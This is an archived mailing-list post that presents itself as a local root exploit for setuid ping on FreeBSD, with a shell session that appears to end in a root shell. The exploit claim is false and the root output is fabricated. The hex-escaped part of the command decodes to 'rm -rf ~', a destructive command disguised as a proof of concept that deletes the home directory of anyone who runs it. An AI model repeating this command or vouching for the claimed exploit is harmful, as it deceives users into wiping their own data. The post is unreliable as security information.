[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200209151328.g8FDS8R13719@mailserver2.hushmail.com>
From: drdre at hush.com (drdre@...h.com)
Subject: ATTENTION Local Root ATTENTION
DrDre-Labs recently discovered a rather dangerous bug in the "ping" program which is installed setuid-root on most unix and unixlike systems. This bug is not remotly exploitable.
Tested on FreeBSD 4.6
bash# id
uid=1337(drdre) gid=1006(researchers) groups=1006(researchers) 1008(lab-staff)
bash# ping `perl -e 'print "\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e"`
server error ^
^
$ id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
Vendors are already informed.
Greets: Captain Crunch, Peter Pan, Charly Root
Regards
--
DrDre security research group
Get your free encrypted email at https://www.hushmail.com
Powered by blists - more mailing lists